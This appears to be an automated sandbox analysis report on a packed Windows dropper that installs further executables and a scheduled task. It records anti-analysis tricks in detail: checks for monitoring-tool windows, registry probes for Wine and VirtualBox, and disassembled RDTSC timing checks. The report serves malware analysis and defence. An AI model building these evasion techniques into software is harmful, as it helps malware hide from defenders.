Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: L0erlgyZ6f.exe

Static file information: File size 2152960 > 1048576

Source: L0erlgyZ6f.exe

Static PE information: Raw size of xxhfmvgp is bigger than: 0x100000 < 0x19dc00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Unpacked PE file: 0.2.L0erlgyZ6f.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xxhfmvgp:EW;aawzkfle:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xxhfmvgp:EW;aawzkfle:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 2.2.rapes.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xxhfmvgp:EW;aawzkfle:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xxhfmvgp:EW;aawzkfle:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 10.2.rapes.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xxhfmvgp:EW;aawzkfle:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xxhfmvgp:EW;aawzkfle:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Unpacked PE file: 13.2.958e367d97.exe.340000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avwkzfda:EW;jtofcfgt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avwkzfda:EW;jtofcfgt:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.10.dr	Static PE information: real checksum: 0x2109d8 should be: 0x215851
Source: rapes.exe.0.dr	Static PE information: real checksum: 0x214c54 should be: 0x21502e
Source: L0erlgyZ6f.exe	Static PE information: real checksum: 0x214c54 should be: 0x21502e
Source: 958e367d97.exe.10.dr	Static PE information: real checksum: 0x2109d8 should be: 0x215851

Source: L0erlgyZ6f.exe	Static PE information: section name:
Source: L0erlgyZ6f.exe	Static PE information: section name: .idata
Source: L0erlgyZ6f.exe	Static PE information: section name:
Source: L0erlgyZ6f.exe	Static PE information: section name: xxhfmvgp
Source: L0erlgyZ6f.exe	Static PE information: section name: aawzkfle
Source: L0erlgyZ6f.exe	Static PE information: section name: .taggant
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: .idata
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: xxhfmvgp
Source: rapes.exe.0.dr	Static PE information: section name: aawzkfle
Source: rapes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.10.dr	Static PE information: section name:
Source: random[1].exe.10.dr	Static PE information: section name: .idata
Source: random[1].exe.10.dr	Static PE information: section name:
Source: random[1].exe.10.dr	Static PE information: section name: avwkzfda
Source: random[1].exe.10.dr	Static PE information: section name: jtofcfgt
Source: random[1].exe.10.dr	Static PE information: section name: .taggant
Source: 958e367d97.exe.10.dr	Static PE information: section name:
Source: 958e367d97.exe.10.dr	Static PE information: section name: .idata
Source: 958e367d97.exe.10.dr	Static PE information: section name:
Source: 958e367d97.exe.10.dr	Static PE information: section name: avwkzfda
Source: 958e367d97.exe.10.dr	Static PE information: section name: jtofcfgt
Source: 958e367d97.exe.10.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Code function: 0_2_053F04D8 pushfd ; ret	0_2_053F04D9
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_004C571D push 3AD38988h; mov dword ptr [esp], eax	10_2_004C573C
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_004C571D push edi; mov dword ptr [esp], eax	10_2_004C5740
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00479FC1 push ecx; ret	10_2_00479FD4

Source: L0erlgyZ6f.exe	Static PE information: section name: entropy: 7.1004505058957434
Source: L0erlgyZ6f.exe	Static PE information: section name: xxhfmvgp entropy: 7.953568295889763
Source: rapes.exe.0.dr	Static PE information: section name: entropy: 7.1004505058957434
Source: rapes.exe.0.dr	Static PE information: section name: xxhfmvgp entropy: 7.953568295889763
Source: random[1].exe.10.dr	Static PE information: section name: entropy: 7.125399433669743
Source: random[1].exe.10.dr	Static PE information: section name: avwkzfda entropy: 7.954177533951379
Source: 958e367d97.exe.10.dr	Static PE information: section name: entropy: 7.125399433669743
Source: 958e367d97.exe.10.dr	Static PE information: section name: avwkzfda entropy: 7.954177533951379

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1168937 second address: 1168963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007EFFE8794FA8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007EFFE8794FA6h 0x0000001f popad 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jnp 00007EFFE8794FA6h 0x00000029 push edi 0x0000002a pop edi 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11563DB second address: 11563F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11563F0 second address: 11563F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11563F4 second address: 11563F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116790E second address: 1167932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE8794FABh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007EFFE8794FA8h 0x00000012 jnc 00007EFFE8794FAAh 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1167A9C second address: 1167AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1167AA5 second address: 1167AB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007EFFE8794FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1167AB0 second address: 1167AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007EFFE92369C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1167D68 second address: 1167D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE8794FADh 0x00000009 pop ecx 0x0000000a jmp 00007EFFE8794FB9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1167D93 second address: 1167DB2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFE92369CCh 0x00000008 pushad 0x00000009 ja 00007EFFE92369C6h 0x0000000f ja 00007EFFE92369C6h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1167DB2 second address: 1167DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFFE8794FB5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1168066 second address: 1168075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE92369CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1168075 second address: 1168095 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFE8794FB4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1168095 second address: 11680AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFFE92369CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B424 second address: 116B42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B42A second address: 116B42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B42E second address: 116B458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFFE8794FAFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B458 second address: 116B45E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B45E second address: 116B464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B4FD second address: 116B502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B502 second address: 116B507 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B651 second address: 116B6A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007EFFE92369CDh 0x00000013 popad 0x00000014 jmp 00007EFFE92369D3h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007EFFE92369D4h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jbe 00007EFFE92369CCh 0x0000002d js 00007EFFE92369C6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B6A9 second address: 116B6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B6AF second address: 116B6EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c movsx esi, bx 0x0000000f lea ebx, dword ptr [ebp+1245C338h] 0x00000015 jc 00007EFFE92369CCh 0x0000001b xor edi, 5998EB6Dh 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007EFFE92369D2h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B793 second address: 116B799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B799 second address: 116B7C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, dword ptr [ebp+122D38EBh] 0x00000011 push 00000000h 0x00000013 mov si, ax 0x00000016 add dword ptr [ebp+122D1AD6h], eax 0x0000001c push 52AC47D7h 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jbe 00007EFFE92369C6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B7C3 second address: 116B81B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a xor dword ptr [esp], 52AC4757h 0x00000011 mov esi, edi 0x00000013 push 00000003h 0x00000015 mov edx, 002877E1h 0x0000001a push 00000000h 0x0000001c jmp 00007EFFE8794FB3h 0x00000021 push 00000003h 0x00000023 add dword ptr [ebp+1245AA76h], ecx 0x00000029 push 9598AA00h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007EFFE8794FAEh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B81B second address: 116B857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5598AA00h 0x00000010 mov dword ptr [ebp+122D246Dh], edi 0x00000016 lea ebx, dword ptr [ebp+1245C341h] 0x0000001c or dword ptr [ebp+122D28E7h], ecx 0x00000022 xchg eax, ebx 0x00000023 push esi 0x00000024 jmp 00007EFFE92369CBh 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push edi 0x0000002f pop edi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B949 second address: 116B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007EFFE8794FA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116B955 second address: 116B979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 js 00007EFFE92369CEh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007EFFE92369C6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 117DB99 second address: 117DBB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118B9EC second address: 118B9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118B9F2 second address: 118B9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
